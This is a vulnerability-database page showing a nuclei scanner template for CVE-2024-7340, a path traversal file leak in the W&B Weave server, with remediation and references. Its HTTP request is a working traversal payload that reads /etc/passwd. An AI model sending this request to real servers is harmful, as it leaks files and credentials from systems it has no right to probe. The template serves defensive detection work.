Lucene search
K

W&B Weave Server - Remote Arbitrary File Leak

🗓️ 29 Jun 2026 05:52:57Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 23 Views

W&B Weave Server Remote File Leak - Lack of Input Validatio

Related
Refs
Code
id: CVE-2024-7340

info:
  name: W&B Weave Server - Remote Arbitrary File Leak
  author: iamnoooob,rootxharsh,pdresearch
  severity: high
  description: |
    The Weave server API allows remote users to fetch files from a specific directory, but due to a lack of input validation, it is possible to traverse and leak arbitrary files remotely. In various common scenarios, this allows a low-privileged user to assume the role of the server admin.
  impact: |
    Authenticated low-privileged attackers can exploit path traversal to read arbitrary files from the server, potentially accessing sensitive configuration files and credentials to escalate privileges to admin level.
  remediation: |
    Update W&B Weave Server to a version that includes the fix from pull request #1657 addressing the path traversal vulnerability.
  reference:
    - https://github.com/advisories/GHSA-r49h-6qxq-624f
    - https://github.com/wandb/weave/pull/1657
    - https://research.jfrog.com/vulnerabilities/wandb-weave-server-remote-arbitrary-file-leak-jfsa-2024-001039248/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2024-7340
    epss-score: 0.04974
    epss-percentile: 0.91116
  metadata:
    verified: true
    max-request: 1
  tags: cve,cve2024,lfr,weave,wandb,vuln

http:
  - raw:
      - |
        GET /__weave/file/tmp/weave/fs/../../../etc/passwd HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: word
        part: header
        words:
          - "application/octet-stream"
          - "filename=passwd"
        condition: and

      - type: status
        status:
          - 200
# digest: 490a0046304402207bf527bca0ebbb14c428c4187e8463798d7987377f99a307034613f63eb09e1f02204b0d64430e24fdd1fdff9c82281b8b17162175d89b1bfcfaf519094f4b8b1db5:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.7High risk
Vulners AI Score7.7
CVSS 3.18.8
EPSS0.04974
SSVC
23